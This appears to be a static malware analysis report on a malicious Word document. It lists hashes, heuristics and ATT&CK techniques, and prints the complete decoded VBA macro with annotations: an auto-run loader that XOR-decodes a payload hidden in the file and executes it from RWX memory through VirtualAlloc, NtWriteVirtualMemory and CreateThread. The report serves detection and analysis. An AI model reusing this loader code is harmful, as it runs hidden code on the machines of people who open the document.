Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 53f9e37fc3054314…

MALICIOUS

Office (OLE)

37.7 KB Created: 2017-07-28 08:08:00 Authoring application: Microsoft Office Word First seen: 2017-08-08
MD5: b838f84f327a1b3d641e869cb8de52a8 SHA-1: 8d1339c1bfebcbe7116958e72de46c6a1eed9a35 SHA-256: 53f9e37fc3054314952abf40a7672c1e7fcaf0c20eb0c03cc5a18fdf512bdd84
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an Office document containing VBA macros, including a Document_Open macro, which is a common technique for initiating malicious actions upon opening. The presence of VirtualAlloc API calls and references to CreateThread suggests the macro is designed to allocate memory and execute code, likely a downloaded payload. The ClamAV detection 'Doc.Downloader.Powload-6809817-0' further supports the downloader functionality.

Heuristics 7

  • ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        uTSmoFniSpfgwHfkvcvhrV
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4908 bytes
SHA-256: 31e7a68b48fa663250664b76ea50c7d86a1ea18c9af1b2f7a54e12009d3740ba
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module attributes written by the VBA project export. VB_Name/VB_Base mark
' this as the document-level "ThisDocument" module, which is where Word
' looks for the Document_Open auto-run handler defined further down.
' Option Explicit forces declarations; note the one untyped Dim in
' uTSmoFniSpfgwHfkvcvhrV (a Variant) is still legal under it.
Option Explicit

#If VBA7 Then
' 64-bit capable imports (LongPtr handles/pointers). The local function
' names are randomized, but the Alias clause still carries the real export
' name, so CreateThread and VirtualAlloc remain visible as plain strings in
' the source - presumably what the SC_STR_VIRTUALALLOC heuristic matched.
' NtWriteVirtualMemory is imported from NTDLL under its own name, with the
' buffer passed ByVal As String (marshalled as an ANSI byte buffer).
Private Declare PtrSafe Function aBOLlxdwLqdokKAAF Lib "kernel32" Alias "CreateThread" (ByVal LxCSfRgkugoLMwJh As Long, ByVal CawWwNupMfXtckzoNLVUPsX As Long, ByVal lSYTKfVevGeCrApJiDtLiRrVOwZKO As LongPtr, WkdxKEPAEGk As Long, ByVal XvfWXmwlLmYlQuAcfogkqiJUzT As Long, LUIYNAqTVPRzNnCAKlRHqdNuq As Long) As LongPtr
Private Declare PtrSafe Function nOtWOIZIHmz Lib "kernel32" Alias "VirtualAlloc" (ByVal iEasIpGe As Long, ByVal bQLLnXqMfzomNWyoxQkNMji As LongPtr, ByVal yfVtjcxOd As Long, ByVal MJhIjRyWNTdUuHBdlzwqaSHCmicXC As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal cAiPkP As LongPtr, ByVal OHspQvof As LongPtr, ByVal KoRgQXsMXTbEvaPBtJR As String, ByVal LEwLVwRdbkxsxIxOfw As LongPtr, ByRef eiwSrOCtHDN As LongPtr) As LongPtr
#Else
' Same three imports for pre-VBA7 (32-bit only) hosts, with Long in place
' of LongPtr so the macro runs on either Office bitness.
Private Declare Function aBOLlxdwLqdokKAAF Lib "kernel32" Alias "CreateThread"  (ByVal LxCSfRgkugoLMwJh As Long, ByVal CawWwNupMfXtckzoNLVUPsX As Long, ByVal lSYTKfVevGeCrApJiDtLiRrVOwZKO As Long, WkdxKEPAEGk As Long, ByVal XvfWXmwlLmYlQuAcfogkqiJUzT As Long, LUIYNAqTVPRzNnCAKlRHqdNuq As Long) As Long
Private Declare Function nOtWOIZIHmz Lib "kernel32" Alias "VirtualAlloc" (ByVal iEasIpGe As Long, ByVal bQLLnXqMfzomNWyoxQkNMji As Long, ByVal yfVtjcxOd As Long, ByVal MJhIjRyWNTdUuHBdlzwqaSHCmicXC As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal cAiPkP As Long, ByVal OHspQvof As Long, ByVal KoRgQXsMXTbEvaPBtJR As String, ByVal LEwLVwRdbkxsxIxOfw As Long, ByRef eiwSrOCtHDN As Long) As Long
#End If

' Allocation arguments for the VirtualAlloc call in uTSmoFniSpfgwHfkvcvhrV:
'   &H1000 = MEM_COMMIT, &H40 = PAGE_EXECUTE_READWRITE.
' A freshly committed RWX region that is then written and started as a
' thread is the standard in-memory code-staging pattern; the RWX protection
' is a strong indicator on its own for memory-scanning and EDR telemetry.
Const sckpaQTSRgMYnzWKFbDHoYAA = &H1000
Const FIiesmsBxKoQlJvyKY = &H40

' Loader routine called from Document_Open. It reads the open document's own
' file from disk, locates an encoded blob after a fixed marker string,
' XOR-decodes it with a hard-coded key, copies it into an RWX region and
' starts a thread on it. No network API is used anywhere in this listing:
' the executed bytes are carried inside the document file itself.
Public Sub uTSmoFniSpfgwHfkvcvhrV()
    Dim aGbGORClmBS() As Byte

    ' Raw bytes of the document currently open in Word (helper defined below).
    aGbGORClmBS = xPzCPBDrWpgddTZcUATUlrbMTL(ActiveDocument.FullName)
    Dim cHfPNaUIaiMHt As String
    ' StrConv(..., 64) = vbUnicode: widen each file byte to one character so
    ' the whole file can be handled with string functions.
    cHfPNaUIaiMHt = StrConv(aGbGORClmBS, 64)
    
    Dim BtgiaryFSGnYyrqdSFEqdCqmHgwn
    ' Split the file text on a long fixed marker; the encoded payload is the
    ' segment after the marker's last occurrence (UBound below). The marker
    ' string itself is a usable static signature for this sample.
    BtgiaryFSGnYyrqdSFEqdCqmHgwn = Split(cHfPNaUIaiMHt, "PiaHLVgiQGcpWIGUoExOaTOTlazIGKFSaExSQXyaMGSUdYmdethrYZYWuhwLwxCfakorkNergwcubTQmOvEmDnTbGBxJBNEodMUSJUSqoQlBXDVBqjXaTpCMqnLJpvPsSNroYYCTDnXMcsecFVssQDuNkhBwijbTaSJjmGDrGdxFsPKYiJdtcxCotDeRwgLtmeMjJ")

    Dim RTtmSpjeeAA As String
    Dim qgjDHFGfOMIdVCkWAbaFnllkHobqZ As String
    Dim ZECGKbPkxxRAYeaPJ As String
    ' Round-trip the last segment through vbUnicode (64) then vbFromUnicode
    ' (128) - presumably to obtain a one-byte-per-character string; exact
    ' effect depends on the host code page, so verify on a live sample.
    qgjDHFGfOMIdVCkWAbaFnllkHobqZ = StrConv(StrConv(BtgiaryFSGnYyrqdSFEqdCqmHgwn(UBound(BtgiaryFSGnYyrqdSFEqdCqmHgwn)), 64), 128)
    ' Drop the first two characters of the segment.
    ZECGKbPkxxRAYeaPJ = Mid$(qgjDHFGfOMIdVCkWAbaFnllkHobqZ, 3, Len(qgjDHFGfOMIdVCkWAbaFnllkHobqZ))

    ' Repeating-key XOR with a hard-coded key (LubLpDMeUYWt below). Because
    ' the key is in the macro, the blob can be decoded offline for analysis.
    RTtmSpjeeAA = LubLpDMeUYWt("QZsaLNgPvuwDnzfHQDquQJCLVArd", ZECGKbPkxxRAYeaPJ)
    
    #If VBA7 Then
        Dim RnZDvcCB As LongPtr
        Dim nztBKMuiLOzTuwPPITts As LongPtr
    #Else
        Dim RnZDvcCB As Long
        Dim nztBKMuiLOzTuwPPITts As Long
    #End If

    ' VirtualAlloc(NULL, Len(decoded), MEM_COMMIT, PAGE_EXECUTE_READWRITE):
    ' the return value (region base) is never checked for 0.
    RnZDvcCB = nOtWOIZIHmz(0, Len(RTtmSpjeeAA), sckpaQTSRgMYnzWKFbDHoYAA, FIiesmsBxKoQlJvyKY)
    ' NtWriteVirtualMemory(-1 = current-process pseudo-handle, region,
    ' decoded buffer, length, NULL): copies the decoded bytes into the
    ' region. Using the NTDLL export rather than WriteProcessMemory is a
    ' mild evasion of kernel32-level hooks.
    nztBKMuiLOzTuwPPITts = NtWriteVirtualMemory(-1, RnZDvcCB, RTtmSpjeeAA, Len(RTtmSpjeeAA), 0)
    ' CreateThread(NULL, 0, region base as start address, NULL, 0, NULL):
    ' executes the decoded bytes inside WINWORD. The thread handle is
    ' discarded; a thread whose start address lies in unbacked RWX memory is
    ' the detection point for this stage.
    nztBKMuiLOzTuwPPITts = aBOLlxdwLqdokKAAF(0, 0, RnZDvcCB, 0, 0, 0)
End Sub

' Reads an entire file into a Byte array. Used by the loader to read the
' document's own on-disk bytes, which is why the payload survives inside
' the .doc without a separate dropped file.
'   bhZOedxGNRJSFTVrBNpj: path of the file to read.
'   Returns: the file contents as Byte().
'   Raises: runtime error 53 (file not found) if Dir() returns "".
Public Function xPzCPBDrWpgddTZcUATUlrbMTL(ByVal bhZOedxGNRJSFTVrBNpj As String) As Byte()
    Dim qgjDHFGfOMIdVCkWAbaFnllkHobqZ As Long
    Dim ZECGKbPkxxRAYeaPJ() As Byte
    qgjDHFGfOMIdVCkWAbaFnllkHobqZ = FreeFile
    ' Dir() returns "" when the path does not exist; LenB is just a non-zero test.
    If LenB(Dir(bhZOedxGNRJSFTVrBNpj)) Then
        Open bhZOedxGNRJSFTVrBNpj For Binary Access Read As qgjDHFGfOMIdVCkWAbaFnllkHobqZ
        ' Size the array to LOF bytes (0-based upper bound) and read it all.
        ReDim ZECGKbPkxxRAYeaPJ(LOF(qgjDHFGfOMIdVCkWAbaFnllkHobqZ) - 1&) As Byte
        Get qgjDHFGfOMIdVCkWAbaFnllkHobqZ, , ZECGKbPkxxRAYeaPJ
        Close qgjDHFGfOMIdVCkWAbaFnllkHobqZ
    Else
        Err.Raise 53
    End If
    xPzCPBDrWpgddTZcUATUlrbMTL = ZECGKbPkxxRAYeaPJ
    ' The assignment above already copied the array; Erase only frees the local.
    Erase ZECGKbPkxxRAYeaPJ
End Function

' Word auto-run entry point: fires when the document is opened with macros
' enabled and immediately hands off to the loader. This is the hook the
' OLE_VBA_DOCOPEN heuristic flags.
Public Sub Document_Open()
    uTSmoFniSpfgwHfkvcvhrV
End Sub

' Excel auto-run entry point chained to the Word one, so the same module
' works if dropped into a workbook (OLE_VBA_WBOPEN). In this Word sample it
' is dead code but is still a useful signature line.
Sub Workbook_Open()
    Document_Open
End Sub

' Repeating-key XOR over a string, one character at a time.
'   pfpNeApRihpEDOMmgkS: the key (cycled with 1-based indexing).
'   LFFxnoZTGgQodTBuJrV: the data to transform.
'   Returns: the XOR of each data character with the corresponding key
'   character. XOR is symmetric, so the same call decodes what it encoded -
'   handy for recovering the blob offline with the key from the caller.
Public Function LubLpDMeUYWt(pfpNeApRihpEDOMmgkS As String, LFFxnoZTGgQodTBuJrV As String) As String
    Dim tyCnLgLPZRO As Long
    Dim dOSKARzPBvlcqbBKmsDPoDlm As String
    Dim sMhCjU As Integer, hnHnAOfjEuvqClxvbghPy As Integer, a As Long

    For tyCnLgLPZRO = 1 To Len(LFFxnoZTGgQodTBuJrV)
        ' Key index wraps 1..Len(key); Mod yields 0 at the wrap point, which
        ' is remapped to the last key character (VBA strings are 1-based).
        a = tyCnLgLPZRO Mod Len(pfpNeApRihpEDOMmgkS)
        If a = 0 Then a = Len(pfpNeApRihpEDOMmgkS)
        
        sMhCjU = Asc(Mid$(LFFxnoZTGgQodTBuJrV, tyCnLgLPZRO, 1))
        hnHnAOfjEuvqClxvbghPy = Asc(Mid$(pfpNeApRihpEDOMmgkS, a, 1))
        ' Builds the output by string concatenation each iteration.
        dOSKARzPBvlcqbBKmsDPoDlm = dOSKARzPBvlcqbBKmsDPoDlm + Chr(sMhCjU Xor hnHnAOfjEuvqClxvbghPy)
    Next tyCnLgLPZRO
    
   LubLpDMeUYWt = dOSKARzPBvlcqbBKmsDPoDlm
End Function